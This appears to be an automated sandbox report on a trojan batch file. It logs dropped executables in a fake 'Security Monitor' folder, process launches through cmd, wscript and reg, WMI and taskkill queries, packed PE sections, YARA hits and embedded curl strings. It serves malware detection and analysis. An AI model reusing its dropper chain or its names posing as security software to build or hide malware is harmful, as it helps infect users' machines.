Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2AFE	73_3_031D2AFE
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2AFE	73_3_031D2AFE
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E7B	73_3_031D1E7B
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E7B	73_3_031D1E7B
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E7B	73_3_031D1E7B
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E7B	73_3_031D1E7B
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E7B	73_3_031D1E7B
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E63	73_3_031D1E63
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E63	73_3_031D1E63
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E63	73_3_031D1E63
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E63	73_3_031D1E63
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E63	73_3_031D1E63
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2587	73_3_031D2587
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2587	73_3_031D2587
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2587	73_3_031D2587
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2587	73_3_031D2587
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2587	73_3_031D2587
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2AFE	73_3_031D2AFE
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2AFE	73_3_031D2AFE
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2AFE	73_3_031D2AFE
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2AFE	73_3_031D2AFE
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2AFE	73_3_031D2AFE
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E7B	73_3_031D1E7B
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E7B	73_3_031D1E7B
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E7B	73_3_031D1E7B
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E7B	73_3_031D1E7B
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E7B	73_3_031D1E7B
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E63	73_3_031D1E63
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E63	73_3_031D1E63
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E63	73_3_031D1E63
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E63	73_3_031D1E63
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E63	73_3_031D1E63
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2587	73_3_031D2587
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2587	73_3_031D2587
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2587	73_3_031D2587
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2587	73_3_031D2587
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2587	73_3_031D2587
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2AFE	73_3_031D2AFE
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2AFE	73_3_031D2AFE
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2AFE	73_3_031D2AFE
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2AFE	73_3_031D2AFE
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2AFE	73_3_031D2AFE
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E7B	73_3_031D1E7B
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E7B	73_3_031D1E7B
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E7B	73_3_031D1E7B
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E7B	73_3_031D1E7B
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E7B	73_3_031D1E7B
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E63	73_3_031D1E63
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E63	73_3_031D1E63
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E63	73_3_031D1E63
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E63	73_3_031D1E63
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E63	73_3_031D1E63
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2587	73_3_031D2587
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2587	73_3_031D2587
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2587	73_3_031D2587
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2587	73_3_031D2587
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2587	73_3_031D2587
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2AFE	73_3_031D2AFE
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2AFE	73_3_031D2AFE
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2AFE	73_3_031D2AFE
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2AFE	73_3_031D2AFE
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D2AFE	73_3_031D2AFE
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E7B	73_3_031D1E7B
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E7B	73_3_031D1E7B
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E7B	73_3_031D1E7B
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E7B	73_3_031D1E7B
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E7B	73_3_031D1E7B
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E63	73_3_031D1E63
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E63	73_3_031D1E63
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E63	73_3_031D1E63
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E63	73_3_031D1E63
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 73_3_031D1E63	73_3_031D1E63

Found potential string decryption / allocating functions

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: String function: 0339565C appears 36 times
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: String function: 00369DB0 appears 70 times
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: String function: 00373380 appears 47 times
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: String function: 00397140 appears 140 times
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: String function: 00373610 appears 43 times
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: String function: 005ED1E8 appears 58 times
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: String function: 00396FB0 appears 191 times
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: String function: 00363850 appears 34 times

PE file contains executable resources (Code or Archives)

Source: [space]= .tmp.19.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: [space]= .tmp.19.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: is-NNSLF.tmp.22.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: is-NNSLF.tmp.22.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: is-719F1.tmp.22.dr	Static PE information: Resource name: RT_BITMAP type: DOS executable (COM)
Source: is-719F1.tmp.22.dr	Static PE information: Resource name: RT_STRING type: COM executable for DOS
Source: is-719F1.tmp.22.dr	Static PE information: Resource name: RT_RCDATA type: COM executable for DOS

PE file contains more sections than normal

Source: is-1I5NJ.tmp.22.dr	Static PE information: Number of sections : 18 > 10
Source: is-719F1.tmp.22.dr	Static PE information: Number of sections : 13 > 10
Source: is-67IFD.tmp.22.dr	Static PE information: Number of sections : 11 > 10
Source: ffws.exe.56.dr	Static PE information: Number of sections : 11 > 10
Source: is-9U2JI.tmp.22.dr	Static PE information: Number of sections : 13 > 10

Uses reg.exe to modify the Windows registry

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\reg.exe reg query "HKU\S-1-5-19\Environment"

Source: [space]= .exe.6.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: is-9U2JI.tmp.22.dr	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
Source: is-719F1.tmp.22.dr	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0

Source: is-9U2JI.tmp.22.dr	Static PE information: Section: ZLIB complexity 1.0016526442307692
Source: is-9U2JI.tmp.22.dr	Static PE information: Section: ZLIB complexity 1.0005696614583333
Source: is-9U2JI.tmp.22.dr	Static PE information: Section: ZLIB complexity 1.0007161458333333
Source: is-9U2JI.tmp.22.dr	Static PE information: Section: ZLIB complexity 1.021484375
Source: is-9U2JI.tmp.22.dr	Static PE information: Section: ZLIB complexity 1.0003823138297872
Source: is-719F1.tmp.22.dr	Static PE information: Section: ZLIB complexity 1.0017903645833333
Source: is-719F1.tmp.22.dr	Static PE information: Section: ZLIB complexity 1.0005696614583333
Source: is-719F1.tmp.22.dr	Static PE information: Section: ZLIB complexity 1.0008680555555556
Source: is-719F1.tmp.22.dr	Static PE information: Section: ZLIB complexity 1.021484375
Source: is-719F1.tmp.22.dr	Static PE information: Section: ZLIB complexity 1.0003551136363635

Source: [space]= .exe.6.dr, Settings.cs

Source: classification engine

Classification label: mal100.troj.evad.winBAT@160/1077@15/9

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe

Code function: 71_2_0037A2A0 GetLastError,_errno,strncpy,FormatMessageA,strrchr,strrchr,_errno,_errno,GetLastError,SetLastError,

71_2_0037A2A0

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe

Code function: 56_2_03376092 GetDiskFreeSpaceA,

56_2_03376092

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe

Code function: 71_2_00363700 memset,GetLastError,CreateToolhelp32Snapshot,GetLastError,Module32First,Module32Next,CloseHandle,

71_2_00363700

Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\[space]= .exe.log

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2456:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2224:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7576:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7172:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6444:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7756:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1316:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1712:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2476:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7788:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3148:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8092:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7592:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6072:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7844:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3864:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7892:120:WilError_03

Source: C:\Windows\System32\cmd.exe

File created: C:\Users\user\AppData\Local\Temp\183942631522663

Jump to behavior

Source: Yara match	File source: 77.0.spmm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000004D.00000000.2580594653.0000000000401000.00000020.00000001.01000000.00000018.sdmp, type: MEMORY
Source: Yara match	File source: 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp, type: MEMORY
Source: Yara match	File source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-EO3DV.tmp, type: DROPPED

Source: unknown

Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\D0WmCTD2qO.bat" "

Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp

Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\plist.vbs"

Source: C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878\[space]= .exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'SEM.EXE'
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "cmd.exe" OR Caption = "wlg.exe" OR Caption = "spmm.exe" OR Caption = "spkl.exe" OR Caption = "spm.exe" OR Caption = "sem.exe" OR Caption = "clv.exe" OR Caption = "akl.exe" OR Caption = "sps.exe" OR Caption = "sime64.exe" OR Caption = "ff.exe" OR Caption = "mrec.exe" OR Caption = "clvhost.exe" OR Caption = "ffws.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "cmd.exe" OR Caption = "wlg.exe" OR Caption = "spmm.exe" OR Caption = "spkl.exe" OR Caption = "spm.exe" OR Caption = "sem.exe" OR Caption = "clv.exe" OR Caption = "akl.exe" OR Caption = "sps.exe" OR Caption = "sime64.exe" OR Caption = "ff.exe" OR Caption = "mrec.exe" OR Caption = "clvhost.exe" OR Caption = "ffws.exe")
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'SPM.EXE'
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'SEM.EXE'

Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp

File read: C:\Users\user\Desktop\desktop.ini

Source: C:\Windows\System32\reg.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization

Source: spmm.exe, 0000004D.00000002.2690607250.0000000061E8A000.00000002.00000001.01000000.00000015.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: spmm.exe, 0000004D.00000002.2690607250.0000000061E8A000.00000002.00000001.01000000.00000015.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: spmm.exe, 0000004D.00000002.2690607250.0000000061E8A000.00000002.00000001.01000000.00000015.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: spmm.exe, 0000004D.00000002.2690607250.0000000061E8A000.00000002.00000001.01000000.00000015.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
Source: spmm.exe, 0000004D.00000002.2690607250.0000000061E8A000.00000002.00000001.01000000.00000015.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: spmm.exe, 0000004D.00000002.2690607250.0000000061E8A000.00000002.00000001.01000000.00000015.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: spmm.exe, 0000004D.00000002.2690607250.0000000061E8A000.00000002.00000001.01000000.00000015.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: spmm.exe, 0000004D.00000002.2690607250.0000000061E8A000.00000002.00000001.01000000.00000015.sdmp	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: spmm.exe, 0000004D.00000002.2690607250.0000000061E8A000.00000002.00000001.01000000.00000015.sdmp	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: spkl.exe, 00000038.00000002.2756912357.00000000077BD000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2750231481.0000000006AC6000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE if not exists `wlog` (`id` INTEGER PRIMARY KEY AUTOINCREMENT,`sTime`TEXT,`sJSon`TEXT);
Source: spmm.exe, 0000004D.00000002.2690607250.0000000061E8A000.00000002.00000001.01000000.00000015.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: spmm.exe, 0000004D.00000002.2690607250.0000000061E8A000.00000002.00000001.01000000.00000015.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: spmm.exe, 0000004D.00000002.2690607250.0000000061E8A000.00000002.00000001.01000000.00000015.sdmp	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

Source: D0WmCTD2qO.bat	ReversingLabs: Detection: 26%
Source: D0WmCTD2qO.bat	Virustotal: Detection: 20%

Source: spkl.exe	String found in binary or memory: NATS-SEFI-ADD
Source: spkl.exe	String found in binary or memory: NATS-DANO-ADD
Source: spkl.exe	String found in binary or memory: JIS_C6229-1984-b-add
Source: spkl.exe	String found in binary or memory: jp-ocr-b-add
Source: spkl.exe	String found in binary or memory: JIS_C6229-1984-hand-add
Source: spkl.exe	String found in binary or memory: jp-ocr-hand-add
Source: spkl.exe	String found in binary or memory: ISO_6937-2-add
Source: qrl.exe	String found in binary or memory: Unable to complete request for channel-process-startup
Source: qrl.exe	String found in binary or memory: dns-ipv6-addr
Source: qrl.exe	String found in binary or memory: dns-ipv4-addr
Source: qrl.exe	String found in binary or memory: false-start
Source: qrl.exe	String found in binary or memory: --dns-ipv4-addr <address>
Source: qrl.exe	String found in binary or memory: --dns-ipv6-addr <address>
Source: qrl.exe	String found in binary or memory: --false-start
Source: qrl.exe	String found in binary or memory: -h, --help
Source: qrl.exe	String found in binary or memory: -h, --help
Source: qrl.exe	String found in binary or memory: curl: try 'curl --help' or 'curl --manual' for more information
